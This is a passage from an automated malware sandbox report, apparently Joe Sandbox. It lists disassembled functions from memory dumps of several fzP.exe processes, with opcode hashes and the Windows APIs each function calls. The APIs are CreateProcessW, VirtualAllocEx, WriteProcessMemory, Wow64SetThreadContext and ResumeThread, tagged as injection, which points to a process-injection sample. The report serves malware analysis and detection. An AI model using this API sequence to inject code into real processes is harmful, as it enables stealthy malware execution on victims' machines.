Instruction Fuzzy Hash: 8481C4B4D00269DFDF21CFA9C840BDDBBF5AB09304F1491AAE509B7250DB70AA89CF55

Function 023E614C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 023E7EB9

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 02537b3a923bc89acca84c587aa1e6624b9e0520c37f4125f6b9dada670805fb
Instruction ID: ae12b580cafff0154b333aab0eabcb32b857518b2f82c6c9e7ab72f7402b8431
Opcode Fuzzy Hash: 02537b3a923bc89acca84c587aa1e6624b9e0520c37f4125f6b9dada670805fb
Instruction Fuzzy Hash: 2C81C274D00229CFDF20CFA9C840BEDBBF5AB49304F1491AAE509B7250DB30AA89CF55

Function 023E1BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023E1D79

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0e95e8a298212e5c2691972a05f00767a1cca5cc20501a1884cbf08835d28d53
Instruction ID: 98babbd4d284a0846f00ecebf3b2c50a6a3f9444a90aff79f1394ef5c04303f7
Opcode Fuzzy Hash: 0e95e8a298212e5c2691972a05f00767a1cca5cc20501a1884cbf08835d28d53
Instruction Fuzzy Hash: FC81D3B4D00229DFDF20CFA9C980BDDBBF5AB09300F1090AAE509B7250DB709A89DF55

Function 023E4E40 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023E5011

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 565ba66a54bb14c90ff55c1beee9d46bc6c879986d2c872b12a130f0ce83e8c1
Instruction ID: 252d2929a7af58b2ba0bc3bda8f3b52b5927a694c5f3de9831a1c0a92819a023
Opcode Fuzzy Hash: 565ba66a54bb14c90ff55c1beee9d46bc6c879986d2c872b12a130f0ce83e8c1
Instruction Fuzzy Hash: BD81C1B4D002698FDF21CFA9C840BDDBBF5BB49304F1091AAE509B7250DB70AA89CF55

Function 023E5C78 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023E5E49

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 13307c12d47a31af56ba14a5e14252daa0ca16d4a72ffdaf6ae4bb3cf018a299
Instruction ID: e7b630766c9c9152ce1f6f2d3bee4bb38957aa517e85d5c465c3a44569428f0b
Opcode Fuzzy Hash: 13307c12d47a31af56ba14a5e14252daa0ca16d4a72ffdaf6ae4bb3cf018a299
Instruction Fuzzy Hash: 4381C4B4D00229DFDF21DF69C984BDDBBF5AB09304F1090AAD509B7260DB709A89CF55

Function 023E21F0 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023E22C6

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 25649e7f05278ad034a88a5f23a0e32a0a897daf8d28d92926a3fc33dd3f65a9
Instruction ID: 7c9f82e4300b29d0d564f53d8024269f015d44f9b17fa3c3a7ff570db000976b
Opcode Fuzzy Hash: 25649e7f05278ad034a88a5f23a0e32a0a897daf8d28d92926a3fc33dd3f65a9
Instruction Fuzzy Hash: D74186B5D002589FCF00CFA9D984AEEFBF5BB49314F24902AE819B7250D335AA45CF64

Function 023E21F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023E22C6

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 64c7cf7fc027a68da74215b9112bf9a8ba632f8c8b0adbc5d32ddf32d41f2c2d
Instruction ID: d67a53dcb25f805471cc5c6def23c68c6ebd8ee03abd5d47c2407942dc0dfa7d
Opcode Fuzzy Hash: 64c7cf7fc027a68da74215b9112bf9a8ba632f8c8b0adbc5d32ddf32d41f2c2d
Instruction Fuzzy Hash: 2C4166B5D002589FCF00CFA9D984ADEFBF5BB49314F24902AE819B7250D375AA45CB64

Function 023E1FD0 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023E2085

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ee5b3d4fe846d0e8153348d79ce8bd2c7aab158d234772adf46a90c4de2b0d0e
Instruction ID: 2c3df84c78786b745753d73cc38fe0d6d859db26491c6703722567a6b44cdca9
Opcode Fuzzy Hash: ee5b3d4fe846d0e8153348d79ce8bd2c7aab158d234772adf46a90c4de2b0d0e
Instruction Fuzzy Hash: 094197B9D04258DFCF10CFAAD584ADEFBB5BB19310F14A06AE819B7250C335A946CF64

Function 023E20E8 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023E2195

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8b5f53ecf4122aed1ac949c6f21241ce42fe08f1264afff71f52ced4bd10833c
Instruction ID: dd0e24f1c98a7ad72ae558a36b748d30a3b7d1eae6369315c46bea22655eb7b6
Opcode Fuzzy Hash: 8b5f53ecf4122aed1ac949c6f21241ce42fe08f1264afff71f52ced4bd10833c
Instruction Fuzzy Hash: 023176B8D04258DFCF10CFA9E984ADEFBB5AB49310F14A02AE915B7350D335A946CF64

Function 023E1FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023E2085

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2c61d695b27ebdd08cbaec04a872fe2f87a9302187b81f584fc3cdc197b39a2e
Instruction ID: 7e727bf6d91c9ac276e8e3f9cedeb9b0c45d41f45ebdbeb8bee70f5021c4669f
Opcode Fuzzy Hash: 2c61d695b27ebdd08cbaec04a872fe2f87a9302187b81f584fc3cdc197b39a2e
Instruction Fuzzy Hash: 1D3177B9D042589FCF10CFAAD984ADEFBB5BB19310F10A02AE815B7250D335A945CF65

Function 023E20F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023E2195

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93819720165af98071400f50d66f798e1fd0666b1b05b8476d4371f04b3b5d78
Instruction ID: 8701bf3b87522f406a3fb8700fed12749accf99284305dbde8b9d6866c7b98b9
Opcode Fuzzy Hash: 93819720165af98071400f50d66f798e1fd0666b1b05b8476d4371f04b3b5d78
Instruction Fuzzy Hash: 973165B9D04258DFCF10CFA9D984A9EFBB5AB09310F10A02AE915B7310D335A946CF65

Function 023E1EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 023E1F72

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 61e984f63e5290b5798bedd6b521ca8a4dad4b2ba81ef4dd07865d5c05cd992e
Instruction ID: 2d786d5a2b50ae704629ac03f3aaba1b401220dc082e102b8b201f389edea783
Opcode Fuzzy Hash: 61e984f63e5290b5798bedd6b521ca8a4dad4b2ba81ef4dd07865d5c05cd992e
Instruction Fuzzy Hash: ED31AAB5D012589FCF10CFAAD584ADEFBF1BB49314F24902AE419B7250C378A949CFA5

Function 023E1EC1 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 023E1F72

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c97354925a79fd54f970d3a08efccb315f63a1812b47abb80debba2db89896ac
Instruction ID: 02b827b0005aaccb9a3ee8437d943f6d8fd239fb631904b725cefddc696dd2de
Opcode Fuzzy Hash: c97354925a79fd54f970d3a08efccb315f63a1812b47abb80debba2db89896ac
Instruction Fuzzy Hash: 3331CCB5D012589FCF10CFA9D584ADEFBF1BB49314F24812AE419B7250C338A949CF54

Function 023E2331 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 023E23AE

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b4cfe4f5a057a6795f9611adfb17372bc2cff7f021fe4bedd9f84c7ba84ef507
Instruction ID: ca4997e8134582a0e7c5a44e7cb32e80fbaa43ba52fd146768bcdad60a0918b4
Opcode Fuzzy Hash: b4cfe4f5a057a6795f9611adfb17372bc2cff7f021fe4bedd9f84c7ba84ef507
Instruction Fuzzy Hash: 182199B8D002199FCB10CFA9D585ADEFBF4EB49320F24905AE819B7350C335A946CFA4

Function 023E2338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 023E23AE

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b97e67d8123ffa40de1a9618aad716999832ac9305804164d572f4a7d2e7a219
Instruction ID: 7e7145b8640f702b8dbe4ec7cdd4cd33cdf45b1a2ed99788d071aae4b148fe0d
Opcode Fuzzy Hash: b97e67d8123ffa40de1a9618aad716999832ac9305804164d572f4a7d2e7a219
Instruction Fuzzy Hash: A02186B8D002199FCB10CFA9D584ADEFBF8AB49320F24905AE819B7350D375A945CFA5

Analysis Process: fzP.exePID: 5804, Parent PID: 5396COMMON

Executed Functions

Function 01040901 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

Haq, xrefs: 0104095D

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: fc0cf04f909f880780c27b143d08160536ae55d9df88583fb0566199a654ed13
Instruction ID: d99cd57c1d410d9dbfb4f5ced8fc7e9b3fb4694e0e359b278db05b6ed4734673
Opcode Fuzzy Hash: fc0cf04f909f880780c27b143d08160536ae55d9df88583fb0566199a654ed13
Instruction Fuzzy Hash: 5421D030A052088FCB49EFB8C4646AD7FF1AF85300F1044FAD149EB296EA344E05DB81

Function 01041304 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f1a51794e7b9508ab2a2edd8e02e1c46519e951e64fb3cc261c7b84880a296
Instruction ID: b0b7d927151ecc8bd9f21a43e4878ed913973ad4686a985c1087451f405653cb
Opcode Fuzzy Hash: c9f1a51794e7b9508ab2a2edd8e02e1c46519e951e64fb3cc261c7b84880a296
Instruction Fuzzy Hash: 1D31D67490534ADFCB01EFB8D894AAD7FB2FF84304F20496AE045AB355DB306A95CB51

Function 01040BD8 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58512641980b333b725df6c13921161b82a4c8141b6a1d048b77044a72bba78
Instruction ID: 67568a4ca29bd8747f8e871ce50cf850f63b1cc20f35ba700d235ec53e538d5f
Opcode Fuzzy Hash: e58512641980b333b725df6c13921161b82a4c8141b6a1d048b77044a72bba78
Instruction Fuzzy Hash: 0B71C5747102068FCB45FB79E898A6E7BA2FFC4700B108969E40ADB3A5DF349C058B81

Function 01040BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e39060b7698cc7a4fdc4dfff2f5aa39dc075eb169770cb0a2ff9040f782dbef
Instruction ID: f9aa40d5e7268b08e879c2e8134b7a1a1f4de87338d3a7549bbe7f86065bc6d2
Opcode Fuzzy Hash: 2e39060b7698cc7a4fdc4dfff2f5aa39dc075eb169770cb0a2ff9040f782dbef
Instruction Fuzzy Hash: 7341A0756113068FCB1AFB39E89856E7BA2FFC4700310893DE44A9B665DF349C059F81

Function 01041771 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfe5e840ac4b6ffad79b8166f8d31efb6f8ca2d60a71e7b99c2a82577df08bb
Instruction ID: 7b993a88511a61e4c717925b9d71a2ef03341ddaa62fc211749b960eb403a667
Opcode Fuzzy Hash: 2dfe5e840ac4b6ffad79b8166f8d31efb6f8ca2d60a71e7b99c2a82577df08bb
Instruction Fuzzy Hash: DB21D4B1F042465FCB44AFBD48542AFBEEAAFC9200B25847ED14ED7382DE348C018761

Function 010407F7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7947c04613461e2317d930a08b916029a7c8facce4736d32593ea3e02d5242a1
Instruction ID: e81d9b4ce24ed3f7053a114da1ac9c5b0bb07358ef122387ebbbf4240b484d08
Opcode Fuzzy Hash: 7947c04613461e2317d930a08b916029a7c8facce4736d32593ea3e02d5242a1
Instruction Fuzzy Hash: AD21F5B452E3869FC703F728FCA06543FA5EB817007694D96E8C4CF11BD6341A5A8B91

Function 01041660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b5879a96fef0b39b14eeb4e1d3ce0179039c75f499eaae571e6a5f26b2470b
Instruction ID: b94185d48554c8faadced69dceb43f08934dc625715dd83532020aec77eb93eb
Opcode Fuzzy Hash: 32b5879a96fef0b39b14eeb4e1d3ce0179039c75f499eaae571e6a5f26b2470b
Instruction Fuzzy Hash: C9217F7890030ADFCB05FFB8D8946AD7BB2FF84700F204969E405AB354EB306A95CB91

Function 01040CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea854be0445eb98d4dc305a9035661fdeeebf793a803e4f43a93ed9ee8aa359
Instruction ID: 34bb5498f00ac8055f50cda7a286ca54428a9d22887c512e5f8f18331e4f6638
Opcode Fuzzy Hash: 7ea854be0445eb98d4dc305a9035661fdeeebf793a803e4f43a93ed9ee8aa359
Instruction Fuzzy Hash: 94216F72700B064BCA59AB79C45816E76E2FF842143108E3DD56A9B690DF34DD064BC2

Function 01040838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b05b63d9a35972655cd5ba9295eda41f83cda26d64a871d7bd7db14470852d2
Instruction ID: 8473c9f6c93a4ad7b79cbb01da27a8138fb0a800f45d377ab40de55f159e6c07
Opcode Fuzzy Hash: 8b05b63d9a35972655cd5ba9295eda41f83cda26d64a871d7bd7db14470852d2
Instruction Fuzzy Hash: F811377411E2468FCB02EF28F990D553B72FBC47047244E59E4488F12AD6745D45DF80

Function 01040848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2350699470.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1040000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f60f89011a8201f7b772be5e97c167c2d6cf9cc84a57826da0be551fdbd9770
Instruction ID: bacd4b69f402f1c1e4ae09a1f329763ca7d83c5894d2adec5ed003392ef36311
Opcode Fuzzy Hash: 6f60f89011a8201f7b772be5e97c167c2d6cf9cc84a57826da0be551fdbd9770
Instruction Fuzzy Hash: 1101ED7811920ADFCB02FF28F9A0E4537A6F7C4B04B208E65B8488F229D6746D559F80

Analysis Process: fzP.exePID: 4708, Parent PID: 5396COMMON

Executed Functions

Function 03180901 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

Haq, xrefs: 0318095D

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: a73de97c315f4d397af9523364b42e28d5325766fb32bcc7e5897457f9cbb46b
Instruction ID: f247e4c5dd8f490237de594c1495bd51ccaedd5c93f34361a61f8aaf9a86afc7
Opcode Fuzzy Hash: a73de97c315f4d397af9523364b42e28d5325766fb32bcc7e5897457f9cbb46b
Instruction Fuzzy Hash: BB219D30E05218DFCB48EFB8C494B6EBBB5EF49340F1448A9C509EB285EB349E55CB91

Function 03181304 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00364f6c1b5b28187443a571acd340badaaa92b7901173a63c20a214a24ae10
Instruction ID: aa725bc8f2948df2be91c8fa5dcc3a51bcb756a86eff7b9fe73c960a521f644c
Opcode Fuzzy Hash: a00364f6c1b5b28187443a571acd340badaaa92b7901173a63c20a214a24ae10
Instruction Fuzzy Hash: 0E315474E0024ADFCB05EFB8E8986ADBBB2FF89300F2049A9D5059B351DB346955CF51

Function 03180BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a56a11cd7fc9b7cbe078e17d0a1663ad15746a461f212f15cf6ce36ff1c7a19
Instruction ID: aff1f0f417bd1212fbfd24ee26c207b8a3bd61f087197373e625932e3ef8b3aa
Opcode Fuzzy Hash: 9a56a11cd7fc9b7cbe078e17d0a1663ad15746a461f212f15cf6ce36ff1c7a19
Instruction Fuzzy Hash: 6A719671B002098FCB14EB79E858A6EBBA3FF88740B104969E506DB795DF349C15CF81

Function 03180BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c786413b7a0672beacb6da7603a0fe55ceb9283f2d137aaf0374b4de6085e3
Instruction ID: 242e5b5d94eecb3ae08186ee6eb99d13c310707d71b85733f84433f9ea9c46cd
Opcode Fuzzy Hash: e6c786413b7a0672beacb6da7603a0fe55ceb9283f2d137aaf0374b4de6085e3
Instruction Fuzzy Hash: 50414171B0020A8FCB19EB79E49C56EBBA2FB883403104D69E44687654DF74AC55CF85

Function 03181771 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95aeae141e7f8e0e0acbf71842a5e2d6812d331e322d27945acfd0a0f5c4da90
Instruction ID: 11798e210c119f813d115017b5ebe3895bfed55e5d674a53ef1caa8d6db9756b
Opcode Fuzzy Hash: 95aeae141e7f8e0e0acbf71842a5e2d6812d331e322d27945acfd0a0f5c4da90
Instruction Fuzzy Hash: 2721B0B1F0025A5FCB48EFBD885476EBAE7EFC9240B15886DD14AD7384DE3488058B61

Function 03181660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4ed8cfab2c34c300dde64ede3742b63b94a185e75da786ae03c96f9f950779
Instruction ID: cf0d6f6d904baa29e94c8a6389e1f5e926cec8c289cbda8d5e0953021069f85a
Opcode Fuzzy Hash: 6e4ed8cfab2c34c300dde64ede3742b63b94a185e75da786ae03c96f9f950779
Instruction Fuzzy Hash: 3A213274E0020ADFCB04EFB8E88866DBBB6FF88304F204569E505A7340DB746995CB51

Function 03180CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ab0ce2b9ccc49e34bdcf394938bbcdb8fec9898b2b7bff511d61aa5cc57bd2
Instruction ID: d18835d970c25884bfe6c6acbfe0dd383faf631ed5eecf5c8c1fbab25d0ae529
Opcode Fuzzy Hash: 03ab0ce2b9ccc49e34bdcf394938bbcdb8fec9898b2b7bff511d61aa5cc57bd2
Instruction Fuzzy Hash: 2E218472B00A4A4BCB59FB79845852EB6E3FF882543108D6DD16A9B780DF34EC194FC2

Function 03180838 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473bc5b2191a3bc4c759c94869a20a8494096e64422dce0bab3f08b4e28bbd1a
Instruction ID: 94aa008b019033d882dec4cf0ed3d23fd96fd4c1cbb921bd5135c4e02ee32bab
Opcode Fuzzy Hash: 473bc5b2191a3bc4c759c94869a20a8494096e64422dce0bab3f08b4e28bbd1a
Instruction Fuzzy Hash: DC111270701246DFCB01DF3CF988A55BB76FB49344B205A94F8088B216D67C6D5ADF91

Function 03180848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2354550670.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3180000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90700def8389e433b97e6e09c95b97b8ecbaddf4dc273bca5673d50a030e81f6
Instruction ID: 4b0879cad88751e6c80e8ae8a25fe6c1750071b755d5db342f7654818a5e23a0
Opcode Fuzzy Hash: 90700def8389e433b97e6e09c95b97b8ecbaddf4dc273bca5673d50a030e81f6
Instruction Fuzzy Hash: 9001CC7070120ADFCB01DF6CF988A59BBBAF748344B209A94F8088B215D67C6D59DF91

Analysis Process: fzP.exePID: 1196, Parent PID: 5396COMMON

Executed Functions

Function 02F30901 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

Haq, xrefs: 02F3095D

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: d745a679879bbba3841fe8c74d9804027caf7290f309257a48d4a62ffbb5205b
Instruction ID: e590907a57b461f30015daf70c19e987d78940a5ebd3dc33d5d68a06c0306106
Opcode Fuzzy Hash: d745a679879bbba3841fe8c74d9804027caf7290f309257a48d4a62ffbb5205b
Instruction Fuzzy Hash: B2218E30A052488FCB45EFB884243AE7FB2EF85340F1584AEC9499B295EB349E46C781

Function 02F31304 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

